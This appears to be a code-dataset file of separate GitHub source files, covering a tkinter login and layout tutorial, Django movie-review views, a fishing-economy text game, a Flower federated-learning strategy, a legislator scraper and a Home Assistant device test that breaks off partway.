Button(root,text='C').pack(side=RIGHT,expand=YES,fill=NONE,anchor=NE)\n# Button(root,text='D').pack(side=LEFT,expand=NO,fill=Y,anchor=NW)\n# Button(root,text='E').pack(side=TOP,expand=NO,fill=NONE,anchor=NW)\n# Button(root,text='F').pack(side=BOTTOM,expand=NO,fill=NONE,anchor=NW)\n# Button(root,text='G').pack(anchor=SE)\n# root.mainloop()\n########################################################################\n'''\ngrid() password LoginBox()\n'''\nroot=Tk()\ne=StringVar()\nu=StringVar()\n\ndef cls1(event):\n\tglobal e\n\te.set(\"\")\n\n\ndef cls2(event):\n\tglobal u\n\tu.set(\"\")\n\n\nLabel(root,text=\"Account:\").grid(row=0,sticky=W)\nentry1=Entry(root,textvariable=e)\ne.set(\"input your name here\")\nentry1.bind('<Button-1>',cls1)\n# entry1.selection_clear()\nentry1.grid(row=0,column=1,sticky=E)\n\n\n\nLabel(root,text=\"Password:\").grid(row=1,sticky=W)\nentry2=Entry(root,textvariable=u,show='*')\nentry2.bind('<Button-1>',cls2)\nentry2.grid(row=1,column=1,sticky=E)\ndef callback():\n\tt1 = entry1.get()\n\tt2 = entry2.get()\n\tt3=StringVar()\n\tif (t1 == \"admin\") & (t2 == \"admin\"):\n\t\tt3.set(\"Login successful\")\n\telse:\n\t\tt3.set(\"Login failed\")\n\t\tentry1.delete(0,len(t1))\n\t\tentry2.delete(0,len(t2))\n\tLabel(root,textvariable=t3).grid(row=3,column=0,sticky=EW)\n\t\n\nButton(root,text=\"Login\",command=callback).grid(row=2,column=1,sticky=EW)\n\nroot.mainloop()\n\n'''\ne.delete() removes content\n-- deletes everything in the range from first to last (inclusive of first and last)\n-- if the last argument is omitted, only the item at the index given by first is deleted\n-- use delete(0, END) to clear the whole entry box\n'''\n\n'''\n************ tkinter layouts ****************\n1. 
We have already met one of tkinter's layout managers, the pack layout. It is very simple: no extra configuration is needed, a single call to the pack function is enough.\n2. grid layout: grid can be understood as a grid or table; it divides the window into rows and columns, and we insert the widgets we want into the cells. The advantage of this layout\nis that the relative positions do not change however we drag the window, and it is also very easy to use.\n3. place layout: it positions widgets with rigid coordinates. The biggest problem with this is that whenever a new widget is added to the window the coordinates have to be measured all over again, and\nwe cannot freely enlarge or shrink the window, otherwise the layout may fall apart.\n************** pack layout *************\n1. When we call the pack function with defaults, the widget packed first goes on top and the rest line up downwards; it gives each widget a position and size it considers suitable. This is the default behaviour,\nand it is the way we used above.\n2. The pack function also accepts several options. The side option sets which edge the widget docks to and can be LEFT, TOP, RIGHT or BOTTOM, i.e. left, top, right, bottom. Its\nfill option can be X, Y, BOTH or NONE, that is, fill horizontally, fill vertically, fill in both directions, or do not fill.\n3. Its expand option can be YES or NO, and its anchor option can be N, E, S, W (NESW stand for north, east, south, west, i.e. top, right, bottom, left), any\ncombination of them, or CENTER (meaning the middle).\n4. Its ipadx is the internal padding in the x direction and ipady the internal padding in the y direction; padx is the external padding in the x direction and pady the external padding\nin the y direction.\n************** grid layout *************\n1. Since most of our programs are rectangular, they are especially suited to a grid layout, that is, the grid layout.\n2. When using the grid layout we call the grid function with two options: row for the row and column for the column. Note that row and column\nnumbering both start from 0.\n3. The grid function also has a sticky option, which can take N, E, S, W for top, right, bottom, left; it decides which side the widget starts from, and the login example above illustrates this point well.\n4. The grid layout states a widget's position directly through the row and column numbers, without needing other options.\n5. The grid function also supports options such as ipadx, ipady, padx and pady; they mean the same as for the pack function, and the default padding is 0.\n6. It also supports options such as rowspan, the number of rows to span, and columnspan, the number of columns to span.\n ************* place layout *************\n1. The place layout is perhaps the one with the most to say about it, but it is also the one I least want to talk about.\n2. It uses the place function and comes in absolute and relative forms: absolute placement uses the x and y options, relative placement uses relx, rely, relheight and relwidth.\n3. Since I strongly advise against using this method, I will not go into it further.\n*************** Summary **************\n1. Since I do not recommend place, the pack and grid layouts are the better choices.\n2. But pack and grid cannot be used together in the same container; for anything a bit more complex I still recommend grid.\n''' \n
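\n# --- Added illustration (not part of the original lesson): a minimal,\n# commented-out grid() sketch showing the row/column/sticky/columnspan options\n# described in the notes above. The widget names (demo, etc.) are arbitrary.\n# def grid_demo():\n# \tdemo = Tk()\n# \tLabel(demo,text=\"Name:\").grid(row=0,column=0,sticky=W)\n# \tEntry(demo).grid(row=0,column=1,sticky=EW)\n# \tButton(demo,text=\"OK\").grid(row=1,column=0,columnspan=2,sticky=EW)\n# \tdemo.mainloop()\n","repo_name":"RJocket/lerning","sub_path":"day1_LoginBox.py","file_name":"day1_LoginBox.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40852429094","text":"from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.db.models import Count, Q\nfrom django.http import JsonResponse\nfrom django.http.response import HttpResponse\nfrom django.shortcuts import redirect\nfrom django.urls.base import reverse, reverse_lazy\nfrom django.utils import timezone\nfrom django.views.generic import ListView, DetailView, FormView, TemplateView\nfrom django.views.generic.detail import SingleObjectMixin\nfrom django.views import View\n\nfrom .models import People, Genre, Movie, CastAndCrew, Review\nfrom .forms import ReviewForm\n\n\nclass MovieListView(ListView):\n\n model = Genre\n context_object_name = 'genre_list'\n template_name = 'movie_list.html'\n\n def get_queryset(self):\n\n return Genre.objects.annotate(review_count=Count('movies__reviews')).order_by('-review_count')[:10]\n\nclass GenreListView(ListView):\n\n model = Genre\n context_object_name = 'genre_list'\n template_name = 'genre_list.html'\n ordering = ['genre']\n\nclass GenreDetailView(DetailView):\n\n model = Genre\n context_object_name = 'genre'\n template_name = 'genre_detail.html'\n\nclass MovieDetailView(DetailView):\n\n model = Movie\n context_object_name = 'movie'\n template_name = 'movie_detail.html'\n\n def get_context_data(self, **kwargs): \n context = super(MovieDetailView, self).get_context_data(**kwargs)\n if self.request.user.is_authenticated:\n context['user_review'] = self.get_object().reviews.all().filter(author=self.request.user).first()\n context['review_form'] = ReviewForm()\n context['reviews'] = self.get_object().reviews.all().order_by('-date_posted')\n return context\n\nclass ReviewFormView(SingleObjectMixin, FormView):\n\n template_name = 'movie_detail.html'\n form_class = ReviewForm\n model = Movie\n\n def post(self, 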
request, *args, **kwargs):\n \n if not request.user.is_authenticated:\n return HttpResponse('You must be logged in to review.')\n self.object = self.get_object()\n return super().post(request, *args, **kwargs)\n\n def form_valid(self, form):\n \n form.instance.author = self.request.user\n form.instance.movie = self.object\n form.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n \n return reverse('movie_detail', args=[str(self.object.id)])\n\nclass MovieHybridView(View):\n\n def get(self, request, *args, **kwargs):\n \n view = MovieDetailView.as_view()\n return view(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n \n view = ReviewFormView.as_view()\n return view(request, *args, **kwargs)\n\nclass PeopleDetailView(DetailView):\n\n model = People\n context_object_name = 'people'\n template_name = 'people_detail.html'\n\ndef fetch_get_search(request):\n\n movies = Movie.objects.annotate(review_count=Count('reviews')).order_by('-review_count')\n people = People.objects.all().order_by('name')\n genres = Genre.objects.all().order_by('genre')\n data = {\n 'movies': [],\n 'people': [],\n 'genres': []\n }\n for movie in movies:\n avg_review = movie.avg_review\n data['movies'].append({\n 'title': movie.title,\n 'link': movie.get_absolute_url(),\n 'cover': movie.cover.url,\n 'date_released': movie.date_released,\n 'avg_review': avg_review,\n 'movie_rated':movie.movie_rated,\n 'distribution_company':movie.distribution_company\n })\n for person in people:\n data['people'].append({\n 'name': person.name,\n 'link': person.get_absolute_url(),\n 'picture': person.picture.url,\n 'birth_date': person.birth_date,\n 'birth_place': person.birth_place\n })\n for genre in genres:\n data['genres'].append({\n 'genre': genre.genre,\n 'link': genre.get_absolute_url()\n })\n return JsonResponse(data)\n\nclass SearchView(TemplateView):\n\n template_name = 'search_list.html'\n\n def get_context_data(self, **kwargs):\n \n context = {}\n search = self.request.GET.get('search')\n context['search_string'] = search\n context['movie_list'] = Movie.objects.filter(\n Q(title__icontains=search) |\n Q(distribution_company__icontains=search) |\n Q(crew__person__name__icontains=search) |\n Q(crew__role__icontains=search) |\n Q(genre__genre__icontains=search)\n ).distinct().order_by('title')\n context['people_list'] = People.objects.filter(\n Q(name__icontains=search) |\n Q(roles__role__icontains=search) |\n Q(roles__movie__title__icontains=search)\n ).distinct().order_by('name')\n context['genre_list'] = Genre.objects.filter(\n Q(genre__icontains=search) |\n Q(movies__title__icontains=search)\n ).distinct().order_by('genre')\n return context\n\ndef fetch_get_reviews(request):\n\n reviews = Review.objects.all().filter(author=request.user)\n data = {\n 'reviews': []\n }\n for review in reviews:\n \n data['reviews'].append({\n 'id': review.id,\n 'title': review.title,\n 'movie': review.movie.title,\n 'viewer_rating': review.viewer_rating,\n 'comment': review.comment,\n 'date_posted': review.date_posted.strftime('%d %B %Y, %-I:%M %p'),\n })\n return JsonResponse(data)\n\nclass ReviewUpdateView(LoginRequiredMixin, TemplateView):\n\n def post(self, request, *args, **kwargs):\n\n review = Review.objects.filter(author=request.user, movie=request.POST['movie_id']).first()\n review.title = request.POST['title']\n review.viewer_rating = request.POST['user_viewer_rating'] if 'user_viewer_rating' in request.POST else 0\n review.comment = request.POST['comment']\n review.date_posted = 
timezone.now()\n review.save()\n return redirect('movie_detail', str(review.movie.id))\n\nclass ReviewDeleteView(LoginRequiredMixin, TemplateView):\n\n def post(self, request, *args, **kwargs):\n\n review = Review.objects.filter(author=request.user, movie=request.POST['movie_id']).first()\n review.delete()\n\n return redirect('movie_detail', str(review.movie.id))\n","repo_name":"andydandy21/movie_review_app","sub_path":"movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11536752541","text":"def main():\n l1=float(input(\"Enter the first length: \"))\n l2=float(input(\"Enter the second length: \"))\n l3=float(input(\"Enter the third length: \"))\n calculo=determinar_triangulo(l1,l2,l3)\n if(calculo):\n print(\"Can form a triangle\")\n else:\n print(\"Cannot form a triangle\")\n\ndef determinar_triangulo(l1,l2,l3):\n # triangle inequality: every pair of sides must sum to more than the third\n if (l1+l2)<=l3:\n return False\n if(l2+l3)<=l1:\n return False\n if(l1+l3)<=l2:\n return False\n return True\n\nmain()","repo_name":"Gzanella1/BCC-Bacharelado-Ciencia-da-computacao","sub_path":"Algoritimos/ALG-Lista-5/GZM-ALM-05-EX-07.py","file_name":"GZM-ALM-05-EX-07.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2832431774","text":"import random\nimport math\nimport time\nimport threading\n\nteam_name = input(\"Please enter your team name: \")\nfish_repo_rate = 100\nfish_in_lake = 0\n\n\ndef addFish():\n global fish_in_lake\n threading.Timer(10.0, addFish).start() # called every 10 seconds\n fish_in_lake += fish_repo_rate\n\naddFish()\n\n\nclass fishBanks:\n def __init__(self, teamName):\n self.teamName = teamName\n self.balance = 500\n self.shipLevel = 1\n self.boost_ship_lv = 1\n self.waitTime = 8\n self.pricePerFish = 6.25\n self.pricePerShip = 18.75\n self.revenue = 100 - (self.pricePerFish + self.pricePerShip)\n self.shipUpgradeCost = 50\n self.maxShipsSent = 5\n self.fishCaptureAmount = 75\n self.fish_repo_rate = fish_repo_rate\n self.fleet_num = 1\n self.netWorth = 0\n\n def send_ships(self):\n global fish_in_lake\n fish_in_lake -= self.fishCaptureAmount\n\n if fish_in_lake <= 0:\n print(\"All fish have been captured, please wait for more.\")\n return\n\n if self.balance < 0:\n print(\"Note: You are now in debt by \" + \"$\", str(self.balance))\n\n # scale the payout locally so repeated trips do not compound self.revenue\n revenue = self.revenue * min(self.fleet_num, self.maxShipsSent)\n\n print(\"You have $\", str(self.balance), \"in your account\")\n print(\"sending max amount of level\", self.shipLevel, \"ship(s)...\") # sends ships\n time.sleep(self.waitTime) # wait time depending on the level of ship\n self.balance += revenue # paycheck\n print(\"$\", str(self.balance), \"In your account. You made \" + str(revenue) + \"\\n\")\n\n tip_chance = random.randint(1, 2) # helpful tips\n if tip_chance == 2 and self.shipLevel == 1:\n print(\"Tired of waiting? upgrade your ships by typing 'boost tech'\")\n\n def buy_ships(self):\n quantity = int(input(\"Enter how many level \" + str(self.shipLevel) + \" ship(s) to buy: \"))\n print(\"The total cost for your \" + str(quantity) + \" level\" + str(self.shipLevel) + \" ship(s) is \" +\n str(self.shipUpgradeCost * quantity))\n\n confirm = input(\"Are you sure you want to continue? 
(y/n): \")\n if confirm == \"y\".lower():\n self.balance -= self.shipUpgradeCost * quantity\n self.fleet_num += quantity\n print(\"Sucessfully purchased: \" + str(quantity) + \" level\" + str(self.shipLevel) + \" ship(s)\")\n else:\n return\n\n def sell_ships(self):\n quantity = int(input(\"Enter how many ships to sell: \"))\n returned_cash = quantity * math.floor(self.shipUpgradeCost / 2) - self.balance\n print(\"+\", str(returned_cash) + \" added to your account\")\n print(\"Your bank balance is $\" + str(self.balance + returned_cash))\n\n def boost_tech(self):\n self.shipLevel += 1\n if self.shipLevel == 1:\n self.waitTime = 8\n self.pricePerFish = 6.25\n self.pricePerShip = 18.75\n self.revenue = 100 - (self.pricePerFish + self.pricePerShip)\n self.shipUpgradeCost = 50\n self.maxShipsSent = 5\n self.fishCaptureAmount = 75\n self.fish_repo_rate = 500\n self.netWorth = self.balance + (self.pricePerShip * self.fleet_num)\n\n if self.shipLevel == 2:\n self.waitTime = 5\n self.pricePerFish = 12.5\n self.pricePerShip = 37.5\n self.revenue = 200 - (self.pricePerFish + self.pricePerShip)\n self.shipUpgradeCost = 325\n self.maxShipsSent = 15\n self.fishCaptureAmount = 100\n self.fish_repo_rate = 600\n self.netWorth = self.balance + (self.pricePerShip * self.fleet_num)\n\n if self.shipLevel == 3:\n self.waitTime = 4\n self.pricePerFish = 25\n self.pricePerShip = 150\n self.revenue = 300 - (self.pricePerFish + self.pricePerShip)\n self.shipUpgradeCost = 550\n self.maxShipsSent = 25\n self.fishCaptureAmount = 150\n self.fish_repo_rate = 700\n self.netWorth = self.balance + (self.pricePerShip * self.fleet_num)\n\n if self.shipLevel == 4:\n self.waitTime = 3\n self.pricePerFish = 31.25\n self.pricePerShip = 93.75\n self.revenue = 400 - (self.pricePerFish + self.pricePerShip)\n self.shipUpgradeCost = 775\n self.maxShipsSent = 35\n self.fishCaptureAmount = 200\n self.fish_repo_rate = 800\n self.netWorth = self.balance + (self.pricePerShip * self.fleet_num)\n\n if self.shipLevel == 5:\n self.waitTime = 2\n self.pricePerFish = 37.5\n self.pricePerShip = 112.5\n self.revenue = 500 - (self.pricePerFish + self.pricePerShip)\n self.shipUpgradeCost = 1000\n self.maxShipsSent = 45\n self.fishCaptureAmount = 250\n self.fish_repo_rate = 1000\n self.netWorth = self.balance + (self.pricePerShip * self.fleet_num)\n\n if self.balance - self.pricePerShip < 0:\n print(\"Unable to proceed with your request. 
you need \")\n self.shipLevel -= 1\n return\n\n else:\n\n print(\"Ships boosted to level \" + str(self.shipLevel), \"$\" + str(self.shipUpgradeCost) +\n \" deducted from your account, your balance is $\", str(self.balance - self.shipUpgradeCost))\n self.balance -= self.shipUpgradeCost\n\n print(\"Fish reproduction is now at \" + str(self.fish_repo_rate + 100), \"fish every 10s.\")\n\n\nt1 = fishBanks(team_name)\n\nwhile True:\n print()\n usr_in = input(\"- \")\n if usr_in == \"send ships\".lower():\n t1.send_ships()\n\n if usr_in == \"buy ships\".lower():\n t1.buy_ships()\n\n if usr_in == \"sell ships\".lower():\n t1.sell_ships()\n\n if usr_in == \"boost tech\".lower():\n t1.boost_tech()\n\n if usr_in == \"balance\".lower():\n print(t1.balance)\n\n if usr_in == \"ship num\".lower():\n print(t1.fleet_num)\n\n if usr_in == \"\".lower():\n print(\"\\n\" * 100)\n\n if usr_in == \"fish num\".lower():\n print(fish_in_lake)\n\n if usr_in == \"frr\".lower():\n print(t1.fish_repo_rate)\n\n if usr_in == \"net worth\".lower():\n print(t1.netWorth)\n","repo_name":"Jacob406/Fishbanks-simulation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38064962262","text":"import os\nimport flwr\nimport numpy as np\nfrom veremi.config import Config\nfrom flwr.server.strategy.fedavg import FedAvg\nfrom flwr.server.client_proxy import ClientProxy\nfrom typing import List, Tuple, Union, Optional, Dict, Callable\n\nfrom flwr.common import FitRes, Scalar, Parameters, MetricsAggregationFn, NDArrays\n\n\nclass VeremiFedAvg(FedAvg):\n\n # pylint: disable=too-many-arguments,too-many-instance-attributes\n def __init__(\n self,\n *,\n fraction_fit: float = 1.0,\n fraction_evaluate: float = 1.0,\n min_fit_clients: int = 2,\n min_evaluate_clients: int = 2,\n min_available_clients: int = 2, evaluate_fn: Optional[\n Callable[\n [int, NDArrays, Dict[str, Scalar]],\n Optional[Tuple[float, Dict[str, Scalar]]],\n ]\n ] = None,\n on_fit_config_fn: Optional[Callable[[int], Dict[str, Scalar]]] = None,\n on_evaluate_config_fn: Optional[Callable[[int], Dict[str, Scalar]]] = None,\n accept_failures: bool = True, initial_parameters: Optional[Parameters] = None,\n fit_metrics_aggregation_fn: Optional[MetricsAggregationFn] = None,\n evaluate_metrics_aggregation_fn: Optional[MetricsAggregationFn] = None,\n output_path: str = \"\"\n ) -> None:\n\n \"\"\"VeReMi Federated Averaging Strategy.\n\n Parameters\n ----------\n fraction_fit : float, optional\n Fraction of clients used during training. Defaults to 0.1.\n fraction_evaluate : float, optional\n Fraction of clients used during validation. Defaults to 0.1.\n min_fit_clients : int, optional\n Minimum number of clients used during training. Defaults to 2.\n min_evaluate_clients : int, optional\n Minimum number of clients used during validation. Defaults to 2.\n min_available_clients : int, optional\n Minimum number of total clients in the system. Defaults to 2.\n evaluate_fn : Optional[\n Callable[\n [int, NDArrays, Dict[str, Scalar]],\n Optional[Tuple[float, Dict[str, Scalar]]]\n ]\n ]\n Optional function used for validation. Defaults to None.\n on_fit_config_fn : Callable[[int], Dict[str, Scalar]], optional\n Function used to configure training. Defaults to None.\n on_evaluate_config_fn : Callable[[int], Dict[str, Scalar]], optional\n Function used to configure validation. 
Defaults to None.\n accept_failures : bool, optional\n Whether or not accept rounds containing failures. Defaults to True.\n initial_parameters : Parameters, optional\n Initial global model parameters.\n fit_metrics_aggregation_fn: Optional[MetricsAggregationFn]\n Metrics aggregation function, optional.\n evaluate_metrics_aggregation_fn: Optional[MetricsAggregationFn]\n Metrics aggregation function, optional.\n \"\"\"\n\n super().__init__(fraction_fit=fraction_fit, fraction_evaluate=fraction_evaluate,\n min_fit_clients=min_fit_clients, min_evaluate_clients=min_evaluate_clients,\n min_available_clients=min_available_clients, evaluate_fn=evaluate_fn,\n on_fit_config_fn=on_fit_config_fn, on_evaluate_config_fn=on_evaluate_config_fn,\n accept_failures=accept_failures, initial_parameters=initial_parameters,\n fit_metrics_aggregation_fn=fit_metrics_aggregation_fn,\n evaluate_metrics_aggregation_fn=evaluate_metrics_aggregation_fn)\n\n self.output_path = output_path\n self.load_data()\n self.params = None\n\n def load_data(self):\n if self.initial_parameters is None:\n file = self.output_path + Config.weights_file\n if os.path.exists(file):\n npzfile = np.load(file)\n params = [npzfile[x] for x in npzfile]\n params = flwr.common.ndarrays_to_parameters(params)\n self.initial_parameters = params\n\n def aggregate_fit(\n self,\n server_round: int,\n results: List[Tuple[flwr.server.client_proxy.ClientProxy, flwr.common.FitRes]],\n failures: List[Union[Tuple[ClientProxy, FitRes], BaseException]],\n ) -> Tuple[Optional[Parameters], Dict[str, Scalar]]:\n aggregated_parameters, aggregated_metrics = super().aggregate_fit(server_round, results, failures)\n\n if aggregated_parameters is not None:\n # Convert `Parameters` to `List[np.ndarray]`\n aggregated_ndarrays: List[np.ndarray] = flwr.common.parameters_to_ndarrays(aggregated_parameters)\n self.params = aggregated_ndarrays\n\n return aggregated_parameters, aggregated_metrics\n\n def save_params(self):\n np.savez(f\"{self.output_path}{Config.weights_file}\", *self.params)\n","repo_name":"c2dc/fl-ieee-vtc2023","sub_path":"veremi_fedavg.py","file_name":"veremi_fedavg.py","file_ext":"py","file_size_in_byte":5000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6397117557","text":"#!/usr/bin/env python\n\"\"\"Setup module for infinitewarp_utils.\"\"\"\nfrom datetime import datetime\n\nfrom setuptools import find_packages, setup\n\nbuild_time = datetime.utcnow().strftime('%Y%m%d%H%M%S')\n\nsetup(\n name='infinitewarp_utils',\n version='1.0.{}'.format(build_time),\n description='infinitewarp_utils is a collection of Python helper modules '\n 'for infinitewarp.',\n url='https://github.com/infinitewarp/infinitewarp-python-utils',\n author='Brad Smith',\n author_email='bradster@infinitewarp.com',\n license='MIT',\n packages=find_packages(exclude=['docs', 'tests', 'tests.*']),\n install_requires=[],\n dependency_links=[],\n zip_safe=True,\n)\n","repo_name":"infinitewarp/infinitewarp-python-utils","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7151979975","text":"\"\"\"pm42 URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. 
Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom .views import Init, Dev, ApiLogin, ApiRank, ApiSlot, ApiSlotMe\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', Init.as_view()),\n #path('', Dev.as_view()),\n path('api/login/', ApiLogin.as_view()),\n path('api/rank/', ApiRank.as_view()),\n path('api/slot/me/', ApiSlotMe.as_view()),\n path('api/slot/', ApiSlot.as_view()),\n #path('api/slot/all/', ApiSlot.as_view()),\n #path('api/me/', ApiMe.as_view()),\n]\n","repo_name":"bok000111/42hackathon","sub_path":"pm42/pm42/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29837809767","text":"import re\n\nfrom fiftystates.scrape import NoDataForPeriod\nfrom fiftystates.scrape.legislators import LegislatorScraper, Legislator\n\nimport lxml.html\n\n\nclass FLLegislatorScraper(LegislatorScraper):\n state = 'fl'\n\n def scrape(self, chamber, term):\n if term != '2010':\n raise NoDataForPeriod(term)\n\n if chamber == 'upper':\n self.scrape_senators(term)\n else:\n self.scrape_reps(term)\n\n def scrape_senators(self, term):\n url = (\"http://www.flsenate.gov/Legislators/\"\n \"index.cfm?Mode=Member%20Pages&Submenu=1&Tab=legislators\")\n\n with self.urlopen(url) as page:\n page = lxml.html.fromstring(page)\n\n for link in page.xpath(\"//a[contains(@href, '/legislators')]\"):\n name = re.sub(r\"\\s+\", \" \", link.text).strip()\n\n # Special case - name_tools gets confused\n # by 'JD', thinking it is a suffix instead of a first name\n if name == 'Alexander, JD':\n name = 'JD Alexander'\n elif name == 'Vacant':\n name = 'Vacant Seat'\n\n district = link.xpath('string(../../td[2])').strip()\n party = link.xpath('string(../../td[3])').strip()\n\n leg = Legislator(term, 'upper', district, name,\n party=party)\n leg.add_source(url)\n self.save_legislator(leg)\n\n def scrape_reps(self, term):\n url = (\"http://www.flhouse.gov/Sections/Representatives/\"\n \"representatives.aspx\")\n\n with self.urlopen(url) as page:\n page = lxml.html.fromstring(page.decode('utf8'))\n\n for link in page.xpath(\"//a[contains(@href, 'MemberId')]\"):\n name = re.sub(r\"\\s+\", \" \", link.text).strip()\n\n party = link.xpath('string(../../td[3])').strip()\n if party == 'D':\n party = 'Democrat'\n elif party == 'R':\n party = 'Republican'\n\n district = link.xpath('string(../../td[4])').strip()\n\n leg = Legislator(term, 'lower', district, name,\n party=party)\n leg.add_source(url)\n self.save_legislator(leg)\n","repo_name":"runderwood/fiftystates","sub_path":"fiftystates/scrape/fl/legislators.py","file_name":"legislators.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"71187728514","text":"import queue\r\n\r\ndef Path_search(mp, init_pos, now_pos, empty):\r\n '''Reconstruct the move path from the parent map\r\n \r\n '''\r\n father = ''\r\n child = now_pos\r\n path = []\r\n i = 0\r\n while(child != init_pos):\r\n father = mp.get(child)\r\n father_empty = get_empty_pos(father, empty)\r\n child_empty = get_empty_pos(child, 
empty)\r\n count = father_empty - child_empty\r\n if count == -3:\r\n path.append('s')\r\n elif count == -1:\r\n path.append('d')\r\n elif count == 1:\r\n path.append('a')\r\n elif count == 3:\r\n path.append('w')\r\n child = father\r\n return list(reversed(path))\r\n\r\n\r\ndef Solvable(now_pos, empty):\r\n ''' Decide whether the board can be solved.\r\n Count inversions while skipping the blank: an even count is solvable, an odd count is not.\r\n '''\r\n length = 9\r\n count = 0\r\n for i in range(length-1):\r\n if now_pos[i] == empty:\r\n continue\r\n for j in range(i+1, length):\r\n if now_pos[j] == empty:\r\n continue\r\n if now_pos[i] > now_pos[j]:\r\n count += 1\r\n if count % 2 == 0:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef get_empty_pos(now_pos, empty):\r\n '''Scan the board for the position of the blank tile'''\r\n for i in range(len(now_pos)):\r\n if now_pos[i] == empty:\r\n return i\r\n \r\ndef bfs(init_pos, empty):\r\n ''' Core algorithm:\r\n breadth-first search for the shortest solution\r\n '''\r\n dir = [2, 3, 2, 3, 4, 3, 2, 3, 2]\r\n dis = [[1, 3], [0, 2, 4], [1, 5], [0, 4, 6], [\r\n 1, 3, 5, 7], [2, 4, 8], [3, 7], [4, 6, 8], [5, 7]]\r\n mp = {}\r\n q1 = queue.Queue() # stores board states\r\n q2 = queue.Queue() # stores step counts\r\n q1.put(init_pos)\r\n q2.put(0)\r\n\r\n while(not q1.empty()):\r\n father_pos = q1.get()\r\n step = q2.get()\r\n pos = get_empty_pos(father_pos, empty)\r\n if father_pos == '123456789':\r\n return Path_search(mp,init_pos, father_pos,empty)\r\n for i in range(dir[pos]):\r\n child_pos = list(father_pos)\r\n child_pos[pos], child_pos[dis[pos][i]] = child_pos[dis[pos][i]], child_pos[pos] # move the blank tile\r\n child_pos = ''.join(child_pos)\r\n if child_pos not in mp: # first visit: record the parent state\r\n mp[child_pos] = father_pos\r\n else: # already visited, skip\r\n continue\r\n q1.put(child_pos)\r\n q2.put(step+1)
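\r\n\r\n\r\n# Added worked example (not part of the original module), assuming the blank\r\n# tile is the character '9' as in bfs's goal state: Solvable counts inversions\r\n# while skipping the blank, and an even count means the layout is reachable.\r\n# '123456789' has 0 inversions (solvable); '213456789' has 1 (unsolvable), so:\r\n# assert Solvable('123456789', '9') is True\r\n# assert Solvable('213456789', '9') is False\r\n","repo_name":"Zhlod/Huarong_Road","sub_path":"Game/AI_Move.py","file_name":"AI_Move.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15332783699","text":"\"\"\"Tests for the switch entity.\"\"\"\r\nfrom homeassistant.components.sensor import SensorDeviceClass\r\nfrom homeassistant.components.switch import SwitchDeviceClass\r\nfrom homeassistant.const import (\r\n UnitOfElectricCurrent,\r\n UnitOfElectricPotential,\r\n UnitOfEnergy,\r\n UnitOfPower,\r\n UnitOfTime,\r\n)\r\n\r\nfrom ..const import GRIDCONNECT_2SOCKET_PAYLOAD\r\nfrom ..mixins.lock import BasicLockTests\r\nfrom ..mixins.number import MultiNumberTests\r\nfrom ..mixins.select import BasicSelectTests\r\nfrom ..mixins.sensor import MultiSensorTests\r\nfrom ..mixins.switch import MultiSwitchTests\r\nfrom .base_device_tests import TuyaDeviceTestCase\r\n\r\nSWITCH1_DPS = \"1\"\r\nSWITCH2_DPS = \"2\"\r\nCOUNTDOWN1_DPS = \"9\"\r\nCOUNTDOWN2_DPS = \"10\"\r\nENERGY_DPS = \"17\"\r\nCURRENT_DPS = \"18\"\r\nPOWER_DPS = \"19\"\r\nVOLTAGE_DPS = \"20\"\r\nTEST_DPS = \"21\"\r\nCALIBV_DPS = \"22\"\r\nCALIBA_DPS = \"23\"\r\nCALIBW_DPS = \"24\"\r\nCALIBE_DPS = \"25\"\r\nINITIAL_DPS = \"38\"\r\nLOCK_DPS = \"40\"\r\nMASTER_DPS = \"101\"\r\n\r\n\r\nclass TestGridConnectDoubleSwitch(\r\n BasicLockTests,\r\n BasicSelectTests,\r\n MultiNumberTests,\r\n MultiSensorTests,\r\n MultiSwitchTests,\r\n TuyaDeviceTestCase,\r\n):\r\n __test__ = True\r\n\r\n def setUp(self):\r\n self.setUpForConfig(\r\n \"grid_connect_usb_double_power_point.yaml\",\r\n GRIDCONNECT_2SOCKET_PAYLOAD,\r\n )\r\n self.setUpBasicLock(LOCK_DPS, self.entities.get(\"lock_child_lock\"))\r\n self.setUpBasicSelect(\r\n INITIAL_DPS,\r\n self.entities.get(\"select_initial_state\"),\r\n {\r\n \"on\": \"On\",\r\n \"off\": \"Off\",\r\n \"memory\": \"Last State\",\r\n },\r\n )\r\n 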
